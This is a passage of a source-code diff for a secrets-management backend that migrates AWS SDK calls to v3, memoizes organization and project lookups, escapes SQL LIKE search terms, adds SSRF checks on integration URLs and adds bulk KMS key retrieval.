OrgPermissionIdentityActions.GetToken, @@ -1135,7 +1155,10 @@ export const identityUaServiceFactory = ({ scope: OrganizationActionScope.Any }); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(identityMembershipOrg.scopeOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(identityMembershipOrg.scopeOrgId), + () => orgDAL.findById(identityMembershipOrg.scopeOrgId) + ); const permissionBoundary = validatePrivilegeChangeOperation( shouldUseNewPrivilegeSystem, OrgPermissionIdentityActions.DeleteToken, @@ -1213,7 +1236,7 @@ export const identityUaServiceFactory = ({ ForbiddenError.from(permission).throwUnlessCan(OrgPermissionIdentityActions.Edit, OrgPermissionSubjects.Identity); } const deleted = await keyStore.deleteItems({ - pattern: `lockout:identity:${identityId}:${IdentityAuthMethod.UNIVERSAL_AUTH}:*` + pattern: KeyStorePrefixes.IdentityLockoutStateByMethodPattern(identityId, IdentityAuthMethod.UNIVERSAL_AUTH) }); return { deleted, identityId, orgId: identityMembershipOrg.scopeOrgId }; diff --git a/backend/src/services/identity-v2/identity-dal.ts b/backend/src/services/identity-v2/identity-dal.ts index 7e594227f9c..0a11350e8e2 100644 --- a/backend/src/services/identity-v2/identity-dal.ts +++ b/backend/src/services/identity-v2/identity-dal.ts @@ -1,5 +1,6 @@ import { TDbClient } from "@app/db"; import { AccessScope, AccessScopeData, IdentitiesSchema, TableName } from "@app/db/schemas"; +import { sanitizeSqlLikeString } from "@app/lib/fn"; import { ormify, selectAllTableCols, sqlNestRelationships } from "@app/lib/knex"; import { buildAuthMethods } from "../identity/identity-fns"; @@ -144,7 +145,8 @@ export const identityV2DALFactory = (db: TDbClient) => { } }); - if (filter.search) void baseQuery.whereILike(`${TableName.Identity}.name`, `%${filter.search}%`); + if (filter.search) + void baseQuery.whereILike(`${TableName.Identity}.name`, `%${sanitizeSqlLikeString(filter.search)}%`); const countQuery = baseQuery.clone().count(`${TableName.Identity}.id as count`).first<{ count: string }>(); diff --git a/backend/src/services/identity-v2/identity-fns.ts b/backend/src/services/identity-v2/identity-fns.ts index fde9ef2d3bd..a89762ccab8 100644 --- a/backend/src/services/identity-v2/identity-fns.ts +++ b/backend/src/services/identity-v2/identity-fns.ts @@ -1,10 +1,10 @@ -import { TKeyStoreFactory } from "@app/keystore/keystore"; +import { KeyStorePrefixes, TKeyStoreFactory } from "@app/keystore/keystore"; export const getIdentityActiveLockoutAuthMethods = async ( identityId: string, keyStore: Pick ) => { - const activeLockouts = await keyStore.getKeysByPattern(`lockout:identity:${identityId}:*`); + const activeLockouts = await keyStore.getKeysByPattern(KeyStorePrefixes.IdentityLockoutStatePattern(identityId)); const activeLockoutAuthMethods = new Set(); for await (const key of activeLockouts) { diff --git a/backend/src/services/identity/identity-dal.ts b/backend/src/services/identity/identity-dal.ts index 5a07f383b53..fef202b845e 100644 --- a/backend/src/services/identity/identity-dal.ts +++ b/backend/src/services/identity/identity-dal.ts @@ -1,6 +1,7 @@ import { TDbClient } from "@app/db"; import { IdentityAuthMethod, TableName, TIdentities } from "@app/db/schemas"; import { DatabaseError } from "@app/lib/errors"; +import { sanitizeSqlLikeString } from "@app/lib/fn"; import { ormify, selectAllTableCols } from "@app/lib/knex"; export type TIdentityDALFactory = ReturnType; @@ -47,7 +48,7 @@ export const identityDALFactory = (db: TDbClient) => { if (searchTerm) { query = query.where((qb) => { - void qb.whereILike("name", `%${searchTerm}%`); + void qb.whereILike("name", `%${sanitizeSqlLikeString(searchTerm)}%`); }); } diff --git a/backend/src/services/identity/identity-org-dal.ts b/backend/src/services/identity/identity-org-dal.ts index 893fcaa69ad..cc481cf89c4 100644 --- a/backend/src/services/identity/identity-org-dal.ts +++ b/backend/src/services/identity/identity-org-dal.ts @@ -21,6 +21,7 @@ import { } from "@app/db/schemas"; import { TIdentityLdapAuths } from "@app/db/schemas/identity-ldap-auths"; import { BadRequestError, DatabaseError } from "@app/lib/errors"; +import { sanitizeSqlLikeString } from "@app/lib/fn"; import { selectAllTableCols, sqlNestRelationships } from "@app/lib/knex"; import { buildKnexFilterForSearchResource } from "@app/lib/search-resource/db"; import { OrderByDirection } from "@app/lib/types"; @@ -178,7 +179,7 @@ export const identityOrgDALFactory = (db: TDbClient) => { .as("paginatedIdentity"); if (search?.length) { - void paginatedIdentity.whereILike(`${TableName.Identity}.name`, `%${search}%`); + void paginatedIdentity.whereILike(`${TableName.Identity}.name`, `%${sanitizeSqlLikeString(search)}%`); } if (limit) { @@ -686,7 +687,7 @@ export const identityOrgDALFactory = (db: TDbClient) => { .count(); if (search?.length) { - void query.whereILike(`${TableName.Identity}.name`, `%${search}%`); + void query.whereILike(`${TableName.Identity}.name`, `%${sanitizeSqlLikeString(search)}%`); } const identities = await query; diff --git a/backend/src/services/identity/identity-service.ts b/backend/src/services/identity/identity-service.ts index f3dd02ad18e..fac9d47e86d 100644 --- a/backend/src/services/identity/identity-service.ts +++ b/backend/src/services/identity/identity-service.ts @@ -11,6 +11,8 @@ import { import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types"; import { PgSqlLock, TKeyStoreFactory } from "@app/keystore/keystore"; import { BadRequestError, NotFoundError, PermissionBoundaryError } from "@app/lib/errors"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { TIdentityProjectDALFactory } from "@app/services/identity-project/identity-project-dal"; import { getIdentityActiveLockoutAuthMethods } from "@app/services/identity-v2/identity-fns"; @@ -87,7 +89,9 @@ export const identityServiceFactory = ({ const [rolePermissionDetails] = await permissionService.getOrgPermissionByRoles([role], orgId); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(actorOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize(requestMemoKeys.orgFindById(actorOrgId), () => + orgDAL.findById(actorOrgId) + ); const isCustomRole = Boolean(rolePermissionDetails?.role); if (isCustomRole) { const plan = await licenseService.getPlan(orgId); @@ -215,7 +219,9 @@ export const identityServiceFactory = ({ let customRole: TRoles | undefined; if (role) { const [rolePermissionDetails] = await permissionService.getOrgPermissionByRoles([role], actorOrgId); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(actorOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize(requestMemoKeys.orgFindById(actorOrgId), () => + orgDAL.findById(actorOrgId) + ); const isCustomRole = Boolean(rolePermissionDetails?.role); if (isCustomRole) { @@ -418,7 +424,7 @@ export const identityServiceFactory = ({ scope: OrganizationActionScope.Any, actor, actorId, - orgId: actorOrgId, + orgId, actorAuthMethod, actorOrgId }); diff --git a/backend/src/services/integration-auth/integration-auth-service.ts b/backend/src/services/integration-auth/integration-auth-service.ts index d53e2a39a7f..815fc8417fb 100644 --- a/backend/src/services/integration-auth/integration-auth-service.ts +++ b/backend/src/services/integration-auth/integration-auth-service.ts @@ -1,8 +1,8 @@ +import { KMSClient, ListAliasesCommand } from "@aws-sdk/client-kms"; import { ForbiddenError } from "@casl/ability"; import { createAppAuth } from "@octokit/auth-app"; import { Octokit } from "@octokit/rest"; import { Client as OctopusClient, SpaceRepository as OctopusSpaceRepository } from "@octopusdeploy/api-client"; -import KMS from "aws-sdk/clients/kms.js"; import { ActionProjectType, @@ -1059,7 +1059,7 @@ export const integrationAuthServiceFactory = ({ const { shouldUseSecretV2Bridge, botKey } = await projectBotService.getBotKey(integrationAuth.projectId); const { accessId, accessToken } = await getIntegrationAccessToken(integrationAuth, shouldUseSecretV2Bridge, botKey); - const kms = new KMS({ + const kms = new KMSClient({ region, credentials: { accessKeyId: String(accessId), @@ -1067,7 +1067,7 @@ export const integrationAuthServiceFactory = ({ } }); - const aliases = await kms.listAliases({}).promise(); + const aliases = await kms.send(new ListAliasesCommand({})); const keyAliases = aliases.Aliases!.filter((alias) => { if (!alias.TargetKeyId) return false; diff --git a/backend/src/services/integration-auth/integration-list.ts b/backend/src/services/integration-auth/integration-list.ts index e2581d26c8d..3fff120d413 100644 --- a/backend/src/services/integration-auth/integration-list.ts +++ b/backend/src/services/integration-auth/integration-list.ts @@ -99,6 +99,8 @@ export enum IntegrationUrls { AZURE_DEVOPS_API_URL = "https://dev.azure.com", HUMANITEC_API_URL = "https://api.humanitec.io", CAMUNDA_API_URL = "https://api.cloud.camunda.io", + DIGICERT_SERVICES_API_URL = "https://www.digicert.com/services/v2", + DIGICERT_SERVICES_API_URL_EU = "https://api-eu.digicert.com/services/v2", GCP_SECRET_MANAGER_SERVICE_NAME = "secretmanager.googleapis.com", GCP_SECRET_MANAGER_URL = `https://${GCP_SECRET_MANAGER_SERVICE_NAME}`, @@ -265,6 +267,7 @@ export const getIntegrationOptions = async () => { { name: "Travis CI", slug: "travisci", + syncSlug: "travis-ci", image: "Travis CI.png", isAvailable: true, type: "pat", diff --git a/backend/src/services/integration-auth/integration-sync-secret.ts b/backend/src/services/integration-auth/integration-sync-secret.ts index b031b6c3c91..d5f1c778cd9 100644 --- a/backend/src/services/integration-auth/integration-sync-secret.ts +++ b/backend/src/services/integration-auth/integration-sync-secret.ts @@ -18,11 +18,19 @@ import { UntagResourceCommand, UpdateSecretCommand } from "@aws-sdk/client-secrets-manager"; +import { + AccessDeniedException, + AddTagsToResourceCommand, + DeleteParameterCommand, + DescribeParametersCommand, + GetParametersByPathCommand, + type Parameter, + PutParameterCommand, + SSMClient +} from "@aws-sdk/client-ssm"; import { AssumeRoleCommand, STSClient } from "@aws-sdk/client-sts"; import { createAppAuth } from "@octokit/auth-app"; import { Octokit } from "@octokit/rest"; -import type { AWSError } from "aws-sdk"; -import SSM from "aws-sdk/clients/ssm.js"; import { AxiosError } from "axios"; import https from "https"; import sodium from "libsodium-wrappers"; @@ -37,6 +45,7 @@ import { request } from "@app/lib/config/request"; import { crypto } from "@app/lib/crypto/cryptography"; import { BadRequestError, InternalServerError } from "@app/lib/errors"; import { logger } from "@app/lib/logger"; +import { blockLocalAndPrivateIpAddresses } from "@app/lib/validator"; import { TCreateManySecretsRawFn, TUpdateManySecretsRawFn } from "@app/services/secret/secret-types"; import { TIntegrationDALFactory } from "../integration/integration-dal"; @@ -315,6 +324,8 @@ const syncSecretsAzureAppConfig = async ({ message: "Invalid Azure App Configuration URL provided." }); + await blockLocalAndPrivateIpAddresses(integration.app); + const getCompleteAzureAppConfigValues = async (baseURL: string, url: string) => { let result: AzureAppConfigKeyValue[] = []; while (url) { @@ -331,6 +342,9 @@ const syncSecretsAzureAppConfig = async ({ result = result.concat(res.data.items); url = res.data?.["@nextLink"]; + if (url) { + await blockLocalAndPrivateIpAddresses(url); + } } return result; @@ -504,6 +518,12 @@ const syncSecretsAzureKeyVault = async ({ createManySecretsRawFn: (params: TCreateManySecretsRawFn) => Promise>; updateManySecretsRawFn: (params: TUpdateManySecretsRawFn) => Promise>; }) => { + if (!integration.app) { + throw new BadRequestError({ message: "Azure Key Vault URI is required" }); + } + + await blockLocalAndPrivateIpAddresses(integration.app); + interface GetAzureKeyVaultSecret { id: string; // secret URI value: string; @@ -537,6 +557,9 @@ const syncSecretsAzureKeyVault = async ({ result = result.concat(res.data.value); url = res.data.nextLink; + if (url) { + await blockLocalAndPrivateIpAddresses(url); + } } return result; @@ -828,8 +851,7 @@ const syncSecretsAWSParameterStore = async ({ secretAccessKey = accessToken; } - const ssm = new SSM({ - apiVersion: "2014-11-06", + const ssm = new SSMClient({ region: integration.region as string, credentials: { accessKeyId, @@ -839,7 +861,7 @@ const syncSecretsAWSParameterStore = async ({ }); const metadata = IntegrationMetadataSchema.parse(integration.metadata); - const awsParameterStoreSecretsObj: Record = {}; + const awsParameterStoreSecretsObj: Record = {}; logger.info( `getIntegrationSecrets: integration sync triggered for ssm with [projectId=${projectId}] [environment=${integration.environment.slug}] [secretPath=${integration.secretPath}] [shouldDisableDelete=${metadata.shouldDisableDelete}]` ); @@ -847,15 +869,15 @@ const syncSecretsAWSParameterStore = async ({ let hasNext = true; let nextToken: string | undefined; while (hasNext) { - const parameters = await ssm - .getParametersByPath({ + const parameters = await ssm.send( + new GetParametersByPathCommand({ Path: integration.path as string, Recursive: false, WithDecryption: true, MaxResults: 10, NextToken: nextToken }) - .promise(); + ); if (parameters.Parameters) { parameters.Parameters.forEach((parameter) => { @@ -879,8 +901,8 @@ const syncSecretsAWSParameterStore = async ({ let describeNextToken: string | undefined; while (hasNextDescribePage) { - const parameters = await ssm - .describeParameters({ + const parameters = await ssm.send( + new DescribeParametersCommand({ MaxResults: 10, NextToken: describeNextToken, ParameterFilters: [ @@ -891,7 +913,7 @@ const syncSecretsAWSParameterStore = async ({ } ] }) - .promise(); + ); if (parameters.Parameters) { parameters.Parameters.forEach((parameter) => { @@ -906,8 +928,7 @@ const syncSecretsAWSParameterStore = async ({ describeNextToken = parameters.NextToken; } } catch (error) { - // eslint-disable-next-line @typescript-eslint/no-explicit-any - if ((error as any).code === "AccessDeniedException") { + if (error instanceof AccessDeniedException) { logger.error( `AWS Parameter Store Error [integration=${integration.id}]: double check AWS account permissions (refer to the Infisical docs)` ); @@ -915,7 +936,7 @@ const syncSecretsAWSParameterStore = async ({ response = { isSynced: false, - syncMessage: (error as AWSError)?.message || "Error syncing with AWS Parameter Store" + syncMessage: (error as Error)?.message || "Error syncing with AWS Parameter Store" }; } } @@ -934,15 +955,15 @@ const syncSecretsAWSParameterStore = async ({ ); try { - await ssm - .putParameter({ + await ssm.send( + new PutParameterCommand({ Name: `${integration.path}${key}`, Type: "SecureString", Value: secrets[key].value, ...(metadata.kmsKeyId && { KeyId: metadata.kmsKeyId }), Overwrite: true }) - .promise(); + ); } catch (error) { (error as { secretKey: string }).secretKey = key; throw error; @@ -950,8 +971,8 @@ const syncSecretsAWSParameterStore = async ({ if (metadata.secretAWSTag?.length) { try { - await ssm - .addTagsToResource({ + await ssm.send( + new AddTagsToResourceCommand({ ResourceType: "Parameter", ResourceId: `${integration.path}${key}`, Tags: metadata.secretAWSTag @@ -961,14 +982,13 @@ const syncSecretsAWSParameterStore = async ({ })) : [] }) - .promise(); + ); } catch (err) { logger.error( err, `getIntegrationSecrets: create secret in AWS SSM for failed [projectId=${projectId}] [environment=${integration.environment.slug}] [secretPath=${integration.secretPath}]` ); - // eslint-disable-next-line @typescript-eslint/no-explicit-any - if ((err as any).code === "AccessDeniedException") { + if (err instanceof AccessDeniedException) { logger.error( `AWS Parameter Store Error [integration=${integration.id}]: double check AWS account permissions (refer to the Infisical docs)` ); @@ -976,7 +996,7 @@ const syncSecretsAWSParameterStore = async ({ response = { isSynced: false, - syncMessage: (err as AWSError)?.message || "Error syncing with AWS Parameter Store" + syncMessage: (err as Error)?.message || "Error syncing with AWS Parameter Store" }; } } @@ -995,15 +1015,15 @@ const syncSecretsAWSParameterStore = async ({ // we ensure that the KMS key configured in the integration is applied for ALL parameters on AWS if (secrets[key].value && (shouldUpdateKms || awsParameterStoreSecretsObj[key].Value !== secrets[key].value)) { try { - await ssm - .putParameter({ + await ssm.send( + new PutParameterCommand({ Name: `${integration.path}${key}`, Type: "SecureString", Value: secrets[key].value, Overwrite: true, ...(metadata.kmsKeyId && { KeyId: metadata.kmsKeyId }) }) - .promise(); + ); } catch (error) { (error as { secretKey: string }).secretKey = key; throw error; @@ -1012,8 +1032,8 @@ const syncSecretsAWSParameterStore = async ({ if (awsParameterStoreSecretsObj[key].Name) { try { - await ssm - .addTagsToResource({ + await ssm.send( + new AddTagsToResourceCommand({ ResourceType: "Parameter", ResourceId: awsParameterStoreSecretsObj[key].Name as string, Tags: metadata.secretAWSTag @@ -1023,14 +1043,13 @@ const syncSecretsAWSParameterStore = async ({ })) : [] }) - .promise(); + ); } catch (err) { logger.error( err, `getIntegrationSecrets: update secret in AWS SSM for failed [projectId=${projectId}] [environment=${integration.environment.slug}] [secretPath=${integration.secretPath}]` ); - // eslint-disable-next-line @typescript-eslint/no-explicit-any - if ((err as any).code === "AccessDeniedException") { + if (err instanceof AccessDeniedException) { logger.error( `AWS Parameter Store Error [integration=${integration.id}]: double check AWS account permissions (refer to the Infisical docs)` ); @@ -1038,7 +1057,7 @@ const syncSecretsAWSParameterStore = async ({ response = { isSynced: false, - syncMessage: (err as AWSError)?.message || "Error syncing with AWS Parameter Store" + syncMessage: (err as Error)?.message || "Error syncing with AWS Parameter Store" }; } } @@ -1065,11 +1084,11 @@ const syncSecretsAWSParameterStore = async ({ ); // case: // -> delete secret - await ssm - .deleteParameter({ + await ssm.send( + new DeleteParameterCommand({ Name: awsParameterStoreSecretsObj[key].Name as string }) - .promise(); + ); logger.info( `getIntegrationSecrets: inside of shouldDisableDelete AWS SSM [projectId=${projectId}] [environment=${integration.environment.slug}] [secretPath=${integration.secretPath}] [step=4]` ); @@ -2561,6 +2580,7 @@ const syncSecretsDatabricks = async ({ }) => { const databricksApiUrl = `${integrationAuth.url}/api`; + await blockLocalAndPrivateIpAddresses(databricksApiUrl); // sync secrets to Databricks await Promise.all( Object.keys(secrets).map(async (key) => @@ -2750,6 +2770,7 @@ const syncSecretsAzureDevops = async ({ return { groupId: "", groupName: "" }; }; + await blockLocalAndPrivateIpAddresses(azureDevopsApiUrl); const { groupId, groupName } = await getEnvGroupId(integration.app, integration.appId, integration.environment.name); const variables: Record = {}; @@ -2851,6 +2872,11 @@ const syncSecretsGitLab = async ({ const gitLabApiUrl = integrationAuth.url ? `${integrationAuth.url}/api` : IntegrationUrls.GITLAB_API_URL; + // Validate the base URL to prevent SSRF on all subsequent requests + if (integrationAuth.url) { + await blockLocalAndPrivateIpAddresses(gitLabApiUrl); + } + const getAllEnvVariables = async (integrationAppId: string, accToken: string) => { const headers = { Authorization: `Bearer ${accToken}`, @@ -2862,6 +2888,7 @@ const syncSecretsGitLab = async ({ let url: string | null = `${gitLabApiUrl}/v4/projects/${integrationAppId}/variables?per_page=100`; while (url) { + await blockLocalAndPrivateIpAddresses(url); const response = await request.get(url, { headers }); allEnvVariables = [...allEnvVariables, ...response.data]; @@ -3562,6 +3589,9 @@ const syncSecretsTeamCity = async ({ property: TeamCityBuildConfigParameter[]; } + if (integrationAuth.url) { + await blockLocalAndPrivateIpAddresses(integrationAuth.url); + } if (integration.targetEnvironment && integration.targetEnvironmentId) { // case: sync to specific build-config in TeamCity project const res = ( @@ -3704,6 +3734,12 @@ const syncSecretsHashiCorpVault = async ({ throw new Error("Access ID is required"); } + if (!integrationAuth.url) { + throw new BadRequestError({ message: "HashiCorp Vault URL is required" }); + } + + await blockLocalAndPrivateIpAddresses(integrationAuth.url); + interface LoginAppRoleRes { auth: { client_token: string; @@ -3975,6 +4011,7 @@ const syncSecretsBitbucket = async ({ } if (data.next) { + await blockLocalAndPrivateIpAddresses(data.next); variablesUrl = data.next; } else { hasNextPage = false; @@ -4134,6 +4171,9 @@ const syncSecretsWindmill = async ({ description?: string; } const apiUrl = integration.url ? `${integration.url}/api` : IntegrationUrls.WINDMILL_API_URL; + if (apiUrl) { + await blockLocalAndPrivateIpAddresses(apiUrl); + } // get secrets stored in windmill workspace const res = ( await request.get(`${apiUrl}/w/${integration.appId}/variables/list`, { @@ -4458,7 +4498,11 @@ const syncSecretsRundeck = async ({ } let existingRundeckSecrets: string[] = []; + if (!integration.url) { + return; + } + await blockLocalAndPrivateIpAddresses(integration.url); try { const listResult = await request.get( `${integration.url}/api/44/storage/${integration.path}`, @@ -4532,6 +4576,8 @@ const syncSecretsOctopusDeploy = async ({ throw new InternalServerError({ message: `Unhandled Octopus Deploy scope: ${integration.scope}` }); } + await blockLocalAndPrivateIpAddresses(url); + // SDK doesn't support variable set... const { data: variableSet } = await request.get(url, { headers: { diff --git a/backend/src/services/integration/integration-service.ts b/backend/src/services/integration/integration-service.ts index 885450afe6e..faa1cccf1ff 100644 --- a/backend/src/services/integration/integration-service.ts +++ b/backend/src/services/integration/integration-service.ts @@ -10,6 +10,7 @@ import { } from "@app/ee/services/permission/project-permission"; import { NotFoundError } from "@app/lib/errors"; import { TProjectPermission } from "@app/lib/types"; +import { blockLocalAndPrivateIpAddresses } from "@app/lib/validator"; import { TIntegrationAuthDALFactory } from "../integration-auth/integration-auth-dal"; import { TIntegrationAuthServiceFactory } from "../integration-auth/integration-auth-service"; @@ -108,6 +109,10 @@ export const integrationServiceFactory = ({ }); } + if (url) { + await blockLocalAndPrivateIpAddresses(url); + } + const integration = await integrationDAL.create({ envId: folder.envId, secretPath, diff --git a/backend/src/services/kms/kms-key-dal.ts b/backend/src/services/kms/kms-key-dal.ts index 36ffa336612..132c62bfbb1 100644 --- a/backend/src/services/kms/kms-key-dal.ts +++ b/backend/src/services/kms/kms-key-dal.ts @@ -93,6 +93,62 @@ export const kmskeyDALFactory = (db: TDbClient) => { } }; + const findByIdsWithAssociatedKms = async (ids: string[], tx?: Knex) => { + try { + const results = await (tx || db.replicaNode())(TableName.KmsKey) + .whereIn(`${TableName.KmsKey}.id`, ids) + .join(TableName.Organization, `${TableName.KmsKey}.orgId`, `${TableName.Organization}.id`) + .leftJoin(TableName.InternalKms, `${TableName.KmsKey}.id`, `${TableName.InternalKms}.kmsKeyId`) + .leftJoin(TableName.ExternalKms, `${TableName.KmsKey}.id`, `${TableName.ExternalKms}.kmsKeyId`) + .select(selectAllTableCols(TableName.KmsKey)) + .select( + db.ref("id").withSchema(TableName.InternalKms).as("internalKmsId"), + db.ref("encryptedKey").withSchema(TableName.InternalKms).as("internalKmsEncryptedKey"), + db.ref("encryptionAlgorithm").withSchema(TableName.InternalKms).as("internalKmsEncryptionAlgorithm"), + db.ref("version").withSchema(TableName.InternalKms).as("internalKmsVersion") + ) + .select( + db.ref("id").withSchema(TableName.ExternalKms).as("externalKmsId"), + db.ref("provider").withSchema(TableName.ExternalKms).as("externalKmsProvider"), + db.ref("encryptedProviderInputs").withSchema(TableName.ExternalKms).as("externalKmsEncryptedProviderInput"), + db.ref("status").withSchema(TableName.ExternalKms).as("externalKmsStatus"), + db.ref("statusDetails").withSchema(TableName.ExternalKms).as("externalKmsStatusDetails") + ) + .select( + db.ref("kmsDefaultKeyId").withSchema(TableName.Organization).as("orgKmsDefaultKeyId"), + db.ref("kmsEncryptedDataKey").withSchema(TableName.Organization).as("orgKmsEncryptedDataKey") + ); + + return results.map((result) => ({ + ...KmsKeysSchema.parse(result), + isExternal: Boolean(result?.externalKmsId), + orgKms: { + id: result?.orgKmsDefaultKeyId, + encryptedDataKey: result?.orgKmsEncryptedDataKey + }, + externalKms: result?.externalKmsId + ? { + id: result.externalKmsId, + provider: result.externalKmsProvider, + encryptedProviderInput: result.externalKmsEncryptedProviderInput, + status: result.externalKmsStatus, + statusDetails: result.externalKmsStatusDetails + } + : undefined, + internalKms: result?.internalKmsId + ? { + id: result.internalKmsId, + encryptedKey: result.internalKmsEncryptedKey, + encryptionAlgorithm: result.internalKmsEncryptionAlgorithm, + version: result.internalKmsVersion + } + : undefined + })); + } catch (error) { + throw new DatabaseError({ error, name: "Find by ids with associated kms" }); + } + }; + const findProjectCmeks = async (projectId: string, tx?: Knex) => { try { const result = await (tx || db.replicaNode())(TableName.KmsKey) @@ -136,7 +192,10 @@ export const kmskeyDALFactory = (db: TDbClient) => { .where("projectId", projectId) .where((qb) => { if (search) { - void qb.whereILike("name", `%${search}%`); + const pattern = `%${search}%`; + void qb + .whereILike(`${TableName.KmsKey}.name`, pattern) + .orWhereRaw(`?? ::text ILIKE ?`, [`${TableName.KmsKey}.id`, pattern]); } }) .where(`${TableName.KmsKey}.isReserved`, false) @@ -180,6 +239,14 @@ export const kmskeyDALFactory = (db: TDbClient) => { } }; + const findCmeksByIds = async (ids: string[], tx?: Knex) => { + try { + return await baseCmekQuery({ db, tx }).whereIn(`${TableName.KmsKey}.id`, ids); + } catch (error) { + throw new DatabaseError({ error, name: "Find cmeks by IDs" }); + } + }; + const findCmekByName = async (keyName: string, projectId: string, tx?: Knex) => { try { const key = await baseCmekQuery({ @@ -194,5 +261,14 @@ export const kmskeyDALFactory = (db: TDbClient) => { } }; - return { ...kmsOrm, findByIdWithAssociatedKms, listCmeksByProjectId, findCmekById, findCmekByName, findProjectCmeks }; + return { + ...kmsOrm, + findByIdWithAssociatedKms, + findByIdsWithAssociatedKms, + listCmeksByProjectId, + findCmekById, + findCmeksByIds, + findCmekByName, + findProjectCmeks + }; }; diff --git a/backend/src/services/kms/kms-service.ts b/backend/src/services/kms/kms-service.ts index ba025d9a206..28ddbdad7bd 100644 --- a/backend/src/services/kms/kms-service.ts +++ b/backend/src/services/kms/kms-service.ts @@ -21,6 +21,8 @@ import { AsymmetricKeyAlgorithm, signingService } from "@app/lib/crypto/sign"; import { BadRequestError, ForbiddenRequestError, NotFoundError } from "@app/lib/errors"; import { logger } from "@app/lib/logger"; import { alphaNumericNanoId } from "@app/lib/nanoid"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { getByteLengthForSymmetricEncryptionAlgorithm, KMS_ROOT_CONFIG_UUID, @@ -43,6 +45,7 @@ import { TEncryptWithKmsDataKeyDTO, TEncryptWithKmsDTO, TGenerateKMSDTO, + TGetBulkKeyMaterialDTO, TGetKeyMaterialDTO, TGetPublicKeyDTO, TImportKeyMaterialDTO, @@ -379,6 +382,24 @@ export const kmsServiceFactory = ({ return kmsKey; }; + const getBulkKeyMaterial = async ({ kmsIds }: TGetBulkKeyMaterialDTO) => { + const kmsDocs = await kmsDAL.findByIdsWithAssociatedKms(kmsIds); + + return kmsDocs.map((kmsDoc) => { + if (kmsDoc.isReserved) { + throw new BadRequestError({ message: `Cannot get key material for reserved key [kmsId=${kmsDoc.id}]` }); + } + if (kmsDoc.externalKms) { + throw new BadRequestError({ message: `Cannot get key material for external key [kmsId=${kmsDoc.id}]` }); + } + + const keyCipher = symmetricCipherService(SymmetricKeyAlgorithm.AES_GCM_256); + const keyMaterial = keyCipher.decrypt(kmsDoc.internalKms?.encryptedKey as Buffer, ROOT_ENCRYPTION_KEY); + + return { kmsId: kmsDoc.id, name: kmsDoc.name, keyMaterial }; + }); + }; + const importKeyMaterial = async ( { key, algorithm, name, isReserved, projectId, orgId, keyUsage, kmipMetadata }: TImportKeyMaterialDTO, tx?: Knex @@ -899,7 +920,9 @@ export const kmsServiceFactory = ({ }; const getProjectKeyBackup = async (projectId: string) => { - const project = await projectDAL.findById(projectId); + const project = await requestMemoize(requestMemoKeys.projectFindById(projectId), () => + projectDAL.findById(projectId) + ); if (!project) { throw new NotFoundError({ message: `Project with ID '${projectId}' not found` @@ -953,6 +976,12 @@ export const kmsServiceFactory = ({ }); } + const kmsDoc = await kmsDAL.findByIdWithAssociatedKms(backupKmsKeyId); + if (kmsDoc.orgId !== project.orgId) + throw new ForbiddenRequestError({ + message: "Backup does not belong to project" + }); + const kmsDecryptor = await decryptWithKmsKey({ kmsId: backupKmsKeyId }); const dataKey = await kmsDecryptor({ cipherTextBlob: Buffer.from(backupBase64EncryptedDataKey, "base64") @@ -1085,6 +1114,7 @@ export const kmsServiceFactory = ({ getKmsById, createCipherPairWithDataKey, getKeyMaterial, + getBulkKeyMaterial, importKeyMaterial, signWithKmsKey, verifyWithKmsKey, diff --git a/backend/src/services/kms/kms-types.ts b/backend/src/services/kms/kms-types.ts index 11badd7a510..f2c05b6ad89 100644 --- a/backend/src/services/kms/kms-types.ts +++ b/backend/src/services/kms/kms-types.ts @@ -91,6 +91,10 @@ export type TGetKeyMaterialDTO = { kmsId: string; }; +export type TGetBulkKeyMaterialDTO = { + kmsIds: string[]; +}; + export type TImportKeyMaterialDTO = { key: Buffer; algorithm: SymmetricKeyAlgorithm; diff --git a/backend/src/services/membership-group/membership-group-dal.ts b/backend/src/services/membership-group/membership-group-dal.ts index 121596c74a0..8c266c0a270 100644 --- a/backend/src/services/membership-group/membership-group-dal.ts +++ b/backend/src/services/membership-group/membership-group-dal.ts @@ -6,6 +6,9 @@ import { BadRequestError, DatabaseError } from "@app/lib/errors"; import { ormify, selectAllTableCols, sqlNestRelationships } from "@app/lib/knex"; import { buildKnexFilterForSearchResource } from "@app/lib/search-resource/db"; import { TSearchResourceOperator } from "@app/lib/search-resource/search"; +import { OrderByDirection } from "@app/lib/types"; + +import { OrgGroupsOrderBy } from "./membership-group-types"; export type TMembershipGroupDALFactory = ReturnType; @@ -18,6 +21,8 @@ type TFindGroupArg = { groupId: string; name: Omit; role: Omit; + orderBy: OrgGroupsOrderBy; + orderDirection: OrderByDirection; }>; }; @@ -132,12 +137,12 @@ export const membershipGroupDALFactory = (db: TDbClient) => { const findGroups = async ({ scopeData, tx, filter }: TFindGroupArg) => { try { - const paginatedGroups = (tx || db.replicaNode())(TableName.Membership) + // Base filtered query (no pagination) β€” shared for count and ID subquery + const baseFilterQuery = (tx || db.replicaNode())(TableName.Membership) .whereNotNull(`${TableName.Membership}.actorGroupId`) .join(TableName.Groups, `${TableName.Groups}.id`, `${TableName.Membership}.actorGroupId`) .join(TableName.MembershipRole, `${TableName.Membership}.id`, `${TableName.MembershipRole}.membershipId`) .leftJoin(TableName.Role, `${TableName.MembershipRole}.customRoleId`, `${TableName.Role}.id`) - .distinct(`${TableName.Membership}.id`) .where(`${TableName.Membership}.scopeOrgId`, scopeData.orgId) .where((qb) => { if (filter.groupId) { @@ -153,15 +158,12 @@ export const membershipGroupDALFactory = (db: TDbClient) => { } }); - if (filter.limit) void paginatedGroups.limit(filter.limit); - if (filter.offset) void paginatedGroups.offset(filter.offset); - if (filter.name || filter.role) { buildKnexFilterForSearchResource( - paginatedGroups, + baseFilterQuery, { - name: filter.name!, - role: filter.role! + ...(filter.name && { name: filter.name }), + ...(filter.role && { role: filter.role }) }, (attr) => { switch (attr) { @@ -176,14 +178,53 @@ export const membershipGroupDALFactory = (db: TDbClient) => { ); } + // Count total matching groups (without 